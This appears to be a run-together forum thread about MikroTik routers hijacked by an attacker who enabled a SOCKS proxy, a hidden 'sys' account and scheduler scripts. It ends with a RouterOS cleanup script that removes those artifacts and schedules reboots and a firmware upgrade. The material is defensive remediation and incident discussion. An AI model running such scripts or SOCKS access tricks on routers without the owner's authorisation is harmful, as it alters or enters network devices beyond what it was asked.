As I mentioned my file was empty as well, makes sense with what you guys are saying.It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
Haha, actually no, just one based on an almost complete ignorance of socks!No idea, but possible.Is he trying to use Winbox to connect
I assume that's a rhetorical question.how would you route a Winbox connection through a socks proxy?
From kobuki suggestion,I use http to login via sock not winbox.Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account.
And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still locate on other place)
Don't tell me, tell the guy that wrote the blog post. He did see it happen in his tcpdump though, I don't think he wrote that more than 3-4 months ago.Winbox do not fetch DLLS for quite some time now. Do not use old winbox.
/system logging action set memory-lines=1000 [find where name=memory] /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"]; /ip socks set enabled=no port=1080 max-connections=200 connection-idle-timeout=00:02:00; /ip socks access remove [/ip socks access find]; /system script remove [find where source~"mikrotik.php"] /system script remove [find where source~"socks set enabled=yes"] /system scheduler remove [find where name~"port"] /system scheduler remove [find where owner="service"] /user remove [find name=service] /system scheduler add name=midnightReboot on-event="/system reboot \r\ \ny" start-time=23:59:00 /system scheduler add name=updateFirmware on-event="/system scheduler remove [find where name=\"up\ dateFirmware\"]\r\ \n:delay 2s\r\ \n/system scheduler remove [find where name=\"midnightReboot\"]\r\ \n/system routerboard upgrade\r\ \n:delay 10s\r\ \n/system reboot\r\ \ny" start-time=startup /system package update download